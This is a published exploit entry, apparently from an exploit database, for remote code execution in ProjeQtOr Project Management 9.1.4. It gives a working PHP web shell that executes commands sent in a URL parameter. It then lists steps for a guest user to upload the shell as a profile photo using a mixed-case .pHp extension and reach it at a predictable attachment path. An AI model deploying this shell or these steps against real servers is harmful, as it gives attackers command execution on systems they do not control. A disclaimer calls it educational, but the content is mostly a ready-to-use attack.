Exploits / Vulnerability Discovered : 2021-06-01 |
Type : webapps |
Platform : php
This exploit / vulnerability Projeqtor project management 9.1.4 remote code execution is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: ProjeQtOr Project Management 9.1.4 - Remote Code Execution
# Date: 29.05.2021
# Exploit Author: Temel Demir
# Vendor Homepage: https://www.projeqtor.org
# Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV9.1.4.zip
# Version: v9.1.4
# Tested on: Laragon @WIN10
# Description : Remote code execution and authorization upgrade with guest user. A malicious file can be run with arbitrary file upload in the profile editing section.
PoC Process Step_by_Step:
# 1) Create a file with the below php code and save it as demir.pHp
<?php echo shell_exec($_GET['key'].' 2>&1'); ?>
# 2) Login to ProjeQtOr portal as guest user
# 3) Click -profile- button on header panel.
# 4) Click -add photo- button and chose upload section and browse your demir.pHp file.
# 5) Click OK. Script will give you "Attachment #($number) inserted". Attachment number need us for file path. (demo: attachment number is "23" > file directory "/files/attach//attachment_23/" )
# 6) As a last step you have to add the ".projeqtor" statement to the file extension.
You can call the uploaded file like this > http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor